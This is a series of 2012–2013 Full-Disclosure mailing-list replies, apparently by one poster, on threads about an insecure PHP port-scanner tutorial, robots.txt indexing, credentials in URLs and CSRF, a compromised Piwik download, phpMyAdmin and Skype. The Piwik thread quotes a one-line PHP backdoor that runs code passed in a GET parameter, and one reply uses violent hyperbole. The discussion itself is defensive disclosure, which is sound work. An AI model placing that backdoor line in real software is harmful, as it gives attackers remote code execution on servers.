Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution
Andrew, You realize this guy is trying to advise people through a tutorial? It's not like we're talking about average Joe shipping buggy software... people *teaching bad practices,* especially in this field should be shot dead before they do any more damage. You just can't learn how to code by teaching others to do it wrongly. Pointing back to my comprehensive list, the author missed some of the very basics of programming in general (undefined variables, no indentation..). Chris. On Fri, Mar 8, 2013 at 2:14 AM, Andrew King aking1012@gmail.com wrote: Has anyone considered that loads of stuff is shipped bugged? I mean it's not like they hosted it on their site executable. It's also not like we're talking about vsftpd where it's installed for a legitimate purpose on millions if not billions of PCs. The million eyeball test and trolling a company where one person might have to read 15 articles a day in addition to actual job duties are not even in the same realm. Add to that maybe backdoor software like sub7 had administrative access backdoors. The list goes on. All I'm saying is don't be dense. On Wed, Mar 6, 2013 at 2:57 AM, Christian Sciberras uuf6...@gmail.comwrote: Ulisses, No, I'm blaming developers that are not in the field of security for this mess. Chris. On Wed, Mar 6, 2013 at 1:10 PM, Ulisses Montenegro ulisses.montene...@gmail.com wrote: Christian If you're reading my email as it's the developers' fault, then you got it wrong -- I've been a developer for most of my life. And while things have gotten better in the last years, there are still tons of build your blog 15 minutes or develop a twiiter clone in 2h tutorials/advertisements for various platforms and languages out there which either assume security is a non-issue, or assume the platform/language will take care of it for you. Heck, the manpages for some libc functions on non-GNU platforms still show vulnerable code in examples. perldoc is riddled with code that is just enough to show how a given function should be used, but with no validation whatsoever. I remember reading the training material for an Oracle product (sorry, I really can't recall the name) which touted being able to have the application security handled by infrastructure/middleware componentes as a desirable feature. So while I'd agree that we are getting better at this, we're still far from ideal. The canonical hello world for most languages/platforms out there, in most cases, still does not make explicit references to security issues. On Wed, Mar 6, 2013 at 8:49 AM, Christian Sciberras uuf6...@gmail.comwrote: The article actually recommends looking for information from www.w3schools.com http://www.w3fools.com?! Here's a few other obviously missing things: - script requires input but does not check for it (very bad PHP practice) - what the hell is with that code? Ever heard about indentation? - there should be some very basic sanitization; ints be ints and strings be strings - hiding all errors, that was a very smart thing to do - early 20's html and css coding style to boot Regarding the tool itself, obviously it's not meant to be used publicly, hence why I could close my eye in this respect. UIlisses, developers already do this. Actually, they've been doing it for quite some time. Perhaps the security experts writing tutorials as in that article should follow? On Wed, Mar 6, 2013 at 11:55 AM, Dan Ballance tzewang.do...@gmail.comwrote: +1 On 6 Mar 2013 10:41, Ulisses Montenegro ulisses.montene...@gmail.com wrote: Not including proper input validation and error handling in code samples is one of the most common and harmful practices in the software development industry -- doing it is not optional or advanced, it is mandatory unless you want to be pwned. Developers need to start doing things properly from the very beginning, as habits become harder and harder to change with experience. On Wed, Mar 6, 2013 at 7:33 AM, Benji m...@b3nji.com wrote: Actually, adding input sanitisation really wouldnt increase the code size that much. Are you just incompetent? On Wed, Mar 6, 2013 at 7:46 AM, Źmicier Januszkiewicz ga...@tut.bywrote: Dear list, Well, I suppose this had to be a proof-of-concept piece of code to demonstrate how port scanning can be done in PHP, not a production-grade software. Adding input sanitization would increase the code size by a lot and obscure the concept somewhat (not that there is much to be said anout the concept though). Think we can give the dude some discount for that. Nevertheless, seeing something like this coming from Certified Ethical Hacker and Security + certified makes me doubt the worthness of those certificates. Could be nice to know the exact naming of those certificates to properly disregard them in the future. With best regards, Z. 2013/3/6 laurent gaffie laurent.gaf...@gmail.com http
Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution
The article actually recommends looking for information from www.w3schools.com http://www.w3fools.com?! Here's a few other obviously missing things: - script requires input but does not check for it (very bad PHP practice) - what the hell is with that code? Ever heard about indentation? - there should be some very basic sanitization; ints be ints and strings be strings - hiding all errors, that was a very smart thing to do - early 20's html and css coding style to boot Regarding the tool itself, obviously it's not meant to be used publicly, hence why I could close my eye in this respect. UIlisses, developers already do this. Actually, they've been doing it for quite some time. Perhaps the security experts writing tutorials as in that article should follow? On Wed, Mar 6, 2013 at 11:55 AM, Dan Ballance tzewang.do...@gmail.comwrote: +1 On 6 Mar 2013 10:41, Ulisses Montenegro ulisses.montene...@gmail.com wrote: Not including proper input validation and error handling in code samples is one of the most common and harmful practices in the software development industry -- doing it is not optional or advanced, it is mandatory unless you want to be pwned. Developers need to start doing things properly from the very beginning, as habits become harder and harder to change with experience. On Wed, Mar 6, 2013 at 7:33 AM, Benji m...@b3nji.com wrote: Actually, adding input sanitisation really wouldnt increase the code size that much. Are you just incompetent? On Wed, Mar 6, 2013 at 7:46 AM, Źmicier Januszkiewicz ga...@tut.bywrote: Dear list, Well, I suppose this had to be a proof-of-concept piece of code to demonstrate how port scanning can be done in PHP, not a production-grade software. Adding input sanitization would increase the code size by a lot and obscure the concept somewhat (not that there is much to be said anout the concept though). Think we can give the dude some discount for that. Nevertheless, seeing something like this coming from Certified Ethical Hacker and Security + certified makes me doubt the worthness of those certificates. Could be nice to know the exact naming of those certificates to properly disregard them in the future. With best regards, Z. 2013/3/6 laurent gaffie laurent.gaf...@gmail.com http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/ Finding the vulnerability in this code is left as an exercise to the reader. PS: *Your comment will be awaiting moderation forever.* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “If debugging is the process of removing software bugs, then programming must be the process of putting them in.” - *Edsger Dijkstra* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution
Ulisses, No, I'm blaming developers that are not in the field of security for this mess. Chris. On Wed, Mar 6, 2013 at 1:10 PM, Ulisses Montenegro ulisses.montene...@gmail.com wrote: Christian If you're reading my email as it's the developers' fault, then you got it wrong -- I've been a developer for most of my life. And while things have gotten better in the last years, there are still tons of build your blog 15 minutes or develop a twiiter clone in 2h tutorials/advertisements for various platforms and languages out there which either assume security is a non-issue, or assume the platform/language will take care of it for you. Heck, the manpages for some libc functions on non-GNU platforms still show vulnerable code in examples. perldoc is riddled with code that is just enough to show how a given function should be used, but with no validation whatsoever. I remember reading the training material for an Oracle product (sorry, I really can't recall the name) which touted being able to have the application security handled by infrastructure/middleware componentes as a desirable feature. So while I'd agree that we are getting better at this, we're still far from ideal. The canonical hello world for most languages/platforms out there, in most cases, still does not make explicit references to security issues. On Wed, Mar 6, 2013 at 8:49 AM, Christian Sciberras uuf6...@gmail.comwrote: The article actually recommends looking for information from www.w3schools.com http://www.w3fools.com?! Here's a few other obviously missing things: - script requires input but does not check for it (very bad PHP practice) - what the hell is with that code? Ever heard about indentation? - there should be some very basic sanitization; ints be ints and strings be strings - hiding all errors, that was a very smart thing to do - early 20's html and css coding style to boot Regarding the tool itself, obviously it's not meant to be used publicly, hence why I could close my eye in this respect. UIlisses, developers already do this. Actually, they've been doing it for quite some time. Perhaps the security experts writing tutorials as in that article should follow? On Wed, Mar 6, 2013 at 11:55 AM, Dan Ballance tzewang.do...@gmail.comwrote: +1 On 6 Mar 2013 10:41, Ulisses Montenegro ulisses.montene...@gmail.com wrote: Not including proper input validation and error handling in code samples is one of the most common and harmful practices in the software development industry -- doing it is not optional or advanced, it is mandatory unless you want to be pwned. Developers need to start doing things properly from the very beginning, as habits become harder and harder to change with experience. On Wed, Mar 6, 2013 at 7:33 AM, Benji m...@b3nji.com wrote: Actually, adding input sanitisation really wouldnt increase the code size that much. Are you just incompetent? On Wed, Mar 6, 2013 at 7:46 AM, Źmicier Januszkiewicz ga...@tut.bywrote: Dear list, Well, I suppose this had to be a proof-of-concept piece of code to demonstrate how port scanning can be done in PHP, not a production-grade software. Adding input sanitization would increase the code size by a lot and obscure the concept somewhat (not that there is much to be said anout the concept though). Think we can give the dude some discount for that. Nevertheless, seeing something like this coming from Certified Ethical Hacker and Security + certified makes me doubt the worthness of those certificates. Could be nice to know the exact naming of those certificates to properly disregard them in the future. With best regards, Z. 2013/3/6 laurent gaffie laurent.gaf...@gmail.com http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/ Finding the vulnerability in this code is left as an exercise to the reader. PS: *Your comment will be awaiting moderation forever.* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “If debugging is the process of removing software bugs, then programming must be the process of putting them in.” - *Edsger Dijkstra * ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000 students personal data
he retries and *minutes* after that the phone's ringing - from what I know of Canada's system, only 24/7 official eavesdropping could lead to such a short delay Website load monitoring == eavesdropping? On Tue, Jan 22, 2013 at 8:37 AM, jason swor...@gmail.com wrote: On Mon, Jan 21, 2013 at 5:54 PM, Jeffrey Walton noloa...@gmail.comwrote: On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote: Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already. If his personal information is in the proprietary system, I believe he has every right to very the security of the system. what ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to sell and get a fair price
Valdis, we've had spam companies suing blacklist/antispam companies before... Surely an anonymous person legitimately and legally enforcing copyright can't be harder? On Mon, Jan 14, 2013 at 9:39 PM, valdis.kletni...@vt.edu wrote: On Thu, 10 Jan 2013 12:03:03 -0500, Mikhail A. Utin said: After all,a vulnerability and an exploit are intellectual products. Not sure copyright could be claimed, but why not? Actually, claimed or not, if the exploit was coded in a Berne signatory country, it's almost always automatically copyrighted at creation (most likely to the coder, or to their employer if it was a work-for-hire). In the US, there's a exemption for work product of federal employees - that's one of the few ways for US-produced material to become public domain (expiration of term is the other one, but with ever-increasing copyright terms, it's unclear that anything will ever actually expire in the US). More interesting is the question of how to enforce a copyright claim while remaining anonymous... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to sell and get a fair price
Couldn't one talk through a lawyer? Guess in such a case it would be a matter of how much you trust your lawyer. Also, what stops a person to file it under a company name if that's easier? I admit I'm not into this area, so I might be missing something fundamental... Chris. On Mon, Jan 14, 2013 at 10:34 PM, valdis.kletni...@vt.edu wrote: On Mon, 14 Jan 2013 22:17:12 +0100, Christian Sciberras said: Valdis, we've had spam companies suing blacklist/antispam companies before... Surely an anonymous person legitimately and legally enforcing copyright can't be harder? Yes, but the spam companies at least filed under their own name. Running a lawsuit with a John Doe plaintiff is a little bit harder, and requires finding a cooperative lawyer and judge. The really hard part is proving that you're the rightful owner of the copyright while remaining anonymous (in particular, proving you're the *same* anonymous person who wrote the code). At this point, it helps if you posted the item in question signed with a pseudonymous PGP key that you control, or have other ways to prove that your anonymous is the author's anonymous. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question regarding script vulnerabilities
To be honest, I don't understand the question. Malicious scripts running on your server are a concern, regardless of type of hosting service or a trustworthy provider. Chris. On Thu, Dec 20, 2012 at 2:00 PM, Philip Whitehouse phi...@whiuk.com wrote: Malicious scripts are generally designed to one of two targets: 1) The user-base of the target. An XSS vulnerability typically gives you the ability to hijack a users browser, possibly allowing remote code execution on their machine or intercepting keystrokes while on the site. In addition to allowing your users (and admins) data to be harvested you suffer reputational damage. 2) Remote code targeting the actual site. If the file has permissions, it could delete files on the server. So now we have established the purpose, let's consider deployment: 1) File upload. Many websites deliberately allow file upload (avatars on forums, images for blog posts, shared files and so forth). If not correctly sanitised there is little stopping them uploading a server side script, client side script or other nefarious file. Incidentally this was the main threat of the image exploit - websites couldn't guarantee uploaded avatars didn't contain executable code. 2) Script tags Typically forums will sanitise text to remove script tags. Blogs are often less punitive. If anyone can upload HTML raw then via privilege escalation or hijack there is the potential for an attacker. To be honest if you even slightly suspected your host, you're screwed - malicious scripts are the least of your problems... Philip Whitehouse On 19 Dec 2012, at 05:25, Rand McRanderson therands...@gmail.com wrote: I was curious, if you have a virtual dedicated server or a dedicated server, and a reasonably trustworthy hosting service, are malicious scripts planted by external people a big concern? If so why? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google's robot.txt handling
If you ask me, it's a stupid idea. :) I prefer to know where I am with a service; and (IMHO) I would prefer to query (occasionally) Google for my CC instead of waiting for someone to start taking funds off it. Hiding it only provides a false sense of security - it will last until someone finds the service leaking out CCs. This is especially the case with robots.txt. Can someone on the list please define a good web crawler? There's plenty of crawlers out there, most are relatively unknown how will we know which to trust? I think the problem here is that people are plain stupid and throw in direct entries inside robots.txt, whereas they should be sending wildcard entries. Couple that with actually protecting sensitive areas, and it's a pretty good defence. On a side note, someone already said this, but I'll repeat it for effect: don't thrown in anything on the Net which you're not prepared to protect. If a control panel should not be accessible to the general public, consider restricting access by IP and similar measures. Even a personal certificate is a valid layer of defence... Chris. On Tue, Dec 11, 2012 at 10:38 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Dec 11, 2012 at 4:11 PM, Mario Vilas mvi...@gmail.com wrote: I think we can all agree this is not a vulnerability. Still, I have yet to see an argument saying why what the OP is proposing is a bad idea. It may be a good idea to stop indexing robots.txt to mitigate the faults of lazy or incompetent admins (Google already does this for many specific search queries) and there's not much point in indexing the robots.txt file for legitimate uses anyway. I kind of agree here. The information is valuable for the reconnaissance phase of an attack, buts its not a vulnerability per se. But what is to stop the attacker from fetching it himself/herself since its at a known location for all sites? In this case, Google would be removing aggregated search results (which means the attacker would have to compile it himself/herself). Google removed other interesting searches, such as social security numbers and credit card numbers (or does not provide them to the general public). Jeff On Tue, Dec 11, 2012 at 2:01 PM, Scott Ferguson scott.ferguson.it.consult...@gmail.com wrote: If I understand the OP correctly, he is not stating that listing something in robots.txt would make it inaccessible, but rather that Google indexes the robots.txt files themselves, snipped Well, um, yeah - I got that. So you are what, proposing that moving an open door back a few centimetres solves the (non) problem? Take your proposal to it's logical extension and stop all search engines (especially the ones that don't respect robots.txt) from indexing robots.txt. Now what do you do about Nutch or even some perl script that anyone can whip up in 2 minutes? Security through obscurity is fine when couple with actual security - but relying on it alone is just daft. Expecting to world to change so bad habits have no consequence is dangerously naive. I suspect you're looking to hard at finding fault with Google - who are complying with the robots.txt. Read the spec. - it's about not following the listed directories, not about not listing the robots.txt. Next you'll want laws against bad weather and furniture with sharp corners. Don't put things you don't want seen to see in places that can be seen. On Mon, Dec 10, 2012 at 8:19 PM, Scott Ferguson scott.ferguson.it.consulting () gmail com wrote: /From/: Hurgel Bumpf l0rd_lunatic () yahoo com /Date/: Mon, 10 Dec 2012 19:25:39 + (GMT) Hi list, i tried to contact google, but as they didn't answer my email, i do forward this to FD. This security feature is not cleary a google vulnerability, but exposes websites informations that are not really intended to be public. Conan the bavarian Your point eludes me - Google is indexing something which is publicly available. eg.:- curl http://somesite.tld/robots.txt So it seems the solution to the question your raise is, um, nonsensical. If you don't want something exposed on your web server *don't publish references to it*. The solution, which should be blindingly obvious, is don't create the problem in the first place. Password sensitive directories (htpasswd) - then they don't have to be excluded from search engines (because listing the inaccessible in robots.txt is redundant). You must of missed the first day of web school. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The email that hacks you
From an architectural perspective, auto logins or whatever they're called should work through a random string, just as most providers already do. There is absolutely no reason to pass the username/password from a URL, especially when in plain text as in these cases. Since there is no loss of features (there are safer, saner, sensible alternatives), I think this is better considered a bug, since it is never actually needed in the first place. Also, with the random token system, I think it is best to still require the user/pass when the URL the user is directed to is going to do something such as modifying/updating stuff. Chris. On Wed, Nov 28, 2012 at 12:15 PM, Bogdan Calin bog...@acunetix.com wrote: Yes, I agree with you. However, my opinion it that it should be fixed once and for all in iOS/Webkit (and the other browsers) by disabling resources loaded with credentials. At some point, as a protection for phishing, URLs with the format scheme://username:password@hostname/ were disabled. When you enter in the browser bar something like that it doesn't work in most browsers. I was surprised to see that doing something like image src='scheme://username:password@hostname/path' works in Chrome and Firefox but if you enter the same URL in the browser bar it doesn't work. This doesn't work in Internet Explorer, which is the right behavior in my opinion. I don't see any good reason why something like this should work. Closing this in browsers will solve this problem once and for all. On 11/28/2012 1:00 PM, Guifre wrote: Hello, I can also confirm that this attack works on iPhone, iPad and Mac's default mail client. Of course, it works anywhere where arbitrary client-side code can be executed... IMAHO, the issue here is not your iphone loading images, there are millions of attack vectors to trigger this attack... The problem is the CSRF weaknesses of your router admin panel that should be fixed by synchronizing a secret token or by using any other well known mitigation strategy against these attacks. Best Regards, Guifre. -- Bogdan Calin - bogdan [at] acunetix.com CTO Acunetix Ltd. - http://www.acunetix.com Acunetix Web Security Blog - http://www.acunetix.com/blog Follow us on Twitter - http://www.twitter.com/acunetix ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
At the moment I'm trying to figure out the further sense of this code, but it seems that there might also be some kind of backdoor (because of the use of $_GET). preg_replace(/(.+)/e, $_GET['g'], 'dwm'); You think? Chris. On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker m...@grobecker-wtal.de wrote: preg_replace(/(.+)/e, $_GET['g'], 'dwm'); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] phpmyadmin compromised?
That is not a compromise. It is related to a change in encoding. Please clear your cookies and try again. (I've had this exact problem in the past, but I don't remember the details) Chris. On Mon, Nov 19, 2012 at 5:48 PM, Benji m...@b3nji.com wrote: .. could you have provided any less information? why dont you look through your code instead of emailing a screenshot to a mailing list? really? On Mon, Nov 19, 2012 at 4:47 PM, Benji m...@b3nji.com wrote: .. coul On Mon, Nov 19, 2012 at 4:45 PM, Lucio Crusca lu...@sulweb.org wrote: Hello *, I've setup my browser to remember login password at my server phpmyadmin login page. It usually fills the two fields correctly, but today it showed this crap instead: http://img208.imagevenue.com/img.php?image=38933_php_myadmin_compromised_122_430lo.jpg Since I've already suffered a security breach through phpmyadmin in the past, I immediately suspected another one. Please note that phpmyadmin is shielded by http digest authentication since the previous accident. Are you aware of any security problems related to phpmyadmin (or to Iceweasel 10 for that matter) that can cause such garbage on the login page? Thanks in advance Lucio. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] **VL-JUNK** Re: Skype account + IM history hijack vulnerability
I don't want to justify their problems, but let me answer your question: First and foremost the recent problem seems to be caused by the online service, not their clients. In fact, I don't see it remotely related to the skype client. Secondly, proper security measures does not make you automagically sound with it comes to business logic. Even if they directed all the penetration tools there is out there, this situation might still have gone unnoticed. Also, next time, just don't reply with nonconstructive comments at all, if you have nothing better to say. It is always easy to bash $company when something comes up. Something you should think about, that stupid idiotic flawed company owns assets you don't even come close to. Again, I've nothing to do with Skype, I'm just irritated by the modern attitude of situations like these by clueless people. Chris. On Wed, Nov 14, 2012 at 12:15 PM, Chris C. Russo ch...@calciumsec.comwrote: I'm just not replying, because I have no comments, I can't believe how a huge service like skype doesn't have proper security measures in their website and client. Chris C. Russo Desarrollamos soluciones para hacer el mundo un lugar más seguro, conocemos el valor de su información. w: www.calciumsec.com m: ch...@calciumsec.com m: +54-911 6610-1900 On 14/11/2012 08:00 a.m., Benji wrote: This has nothing to do with the client. The service is at fault. Also for the record, r/netsec is a huge circlejerk. On Wed, Nov 14, 2012 at 10:20 AM, Kirils Solovjovs kirils.solovj...@kirils.com wrote: The team has worked around this and are now trying to fix the bug/feature. :) http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/ P.S. Not to say that there aren't any other security bugs to come. Use a secure client! -- Kirils Solovjovs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day vulnerabilities in Call of Duty MW3 and CryEngine 3
0-day means it is being actively used in the wild. Is this the case? Chris. On Wed, Nov 14, 2012 at 10:52 AM, ReVuln i...@revuln.com wrote: Following our presentation at POC2012 [1] conference, we have released: a paper [2] regarding a NULL pointer dereference vulnerability affecting Call of Duty: Modern Warfare 3 [3], and a video [4] demonstrating a remote code execution vulnerability affecting CryEngine 3 [5]. [1] http://powerofcommunity.net [2] http://revuln.com/files/ReVuln_CoDMW3_null_pointer_dereference.pdf [3] http://www.callofduty.com/mw3 [4] http://vimeo.com/53425372 [5] http://www.crytek.com/cryengine/cryengine3 --- ReVuln http://revuln.com http://twitter.com/revuln ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is it OK to hold credit card numbers in cookies? Santander?
Alex, you just dug your grave there, mate. ;-) On Mon, Oct 15, 2012 at 9:53 PM, Alexander Georgiev alexander.georg...@daloo.de wrote: Well, if we talk about Banks... Hypo Vereinsbank (http://en.wikipedia.org/wiki/HypoVereinsbank) has kind of a strange security style: The online banking website will disable your login once you enter it 3 times wrong. Your login is your BANK ACCOUNT NUMBER. To re-enable it you have to go into one of their offices IN PERSON and identify yourself by ID card and then they will send your new password BY LETTER (not email). Now, PLEASE, when you go to their online banking site and run your one_script_to_block_them_all.py or whatever, PLEASE, skip my bank account, ok? Banking regards, Alex On Mon, 15 Oct 2012 21:10:47 +0200, Rainer Duffner rai...@ultra-secure.de wrote: Am 14.10.2012 um 17:15 schrieb auto62098...@hushmail.com: Santander are a joke when it comes to security. Fed up of two years of battling with them to fix issues any other bank would have fixed in seconds, things like XSS on login pages etc. Time to hit full disclosure with some of these issues in the hope they'll change their game and start to take their customers security seriously: I had to chuckle. The Spanish banks gave 100% mortgages to people who could just barely finance the interest at ultra-low rates. Now, they're taking back those houses and flats, evicting the owners (who can no longer pay) and putting them into rented apartments (for slightly less than the interest rates). The banks were bailed-out by the government, which has now got to be bailed-out by the EU. Do you honestly think that customers actually exist on the radar of those banks? Hell - who needs customers, when you can have a bail-out? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
His initial email doesn't make him look like a newb? Really? Quoting: It appears Adobe has become a whore to Google like Mozilla. Typical response from an attention-starved kid. Except he's no kid. Hmmm. Then there's the whole bullshit he's been talking about - which by the way, several people categorically proved to be inaccurate, if not plain wrong. On Sat, Sep 8, 2012 at 1:15 AM, Mark boogiebr...@yahoo.co.uk wrote: You're right. Jeffrey is no newb. Sorry if it came over the wrong way. On 08/09/2012 0:31, Michael D. Wood wrote: You guys are acting like Jeffrey is a newb to all this stuff. I'm sure he knows what mbam and spybot are, and is able to scan his machine. I'm sure he knows to go straight to the source when downloading flash player, albeit Adobe does include the annoying toolbar unless you choose not to install. -- Michael D. Wood ITSecurityPros.org www.itsecuritypros.org - Reply message - From: Mark boogiebr...@yahoo.co.uk To: noloa...@gmail.com Cc: Full Disclosure b full-disclosure@lists.grok.org.uk, BugTraq bugt...@securityfocus.com Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent Date: Fri, Sep 7, 2012 5:32 pm You didn't download it from download.cnet.com, by any chance? Sounds more like an infection to me. For windows, download and run the following programs. http://www.filehippo.com/download_malwarebytes_anti_malware/ http://www.filehippo.com/download_spybot_search_destroy/5168/ http://www.filehippo.com/download_superantispyware/ On 06/09/2012 19:09, Jeffrey Walton wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Yeah. +1 Troll. (and I don't even like Adobe!) On Thu, Sep 6, 2012 at 7:09 PM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure
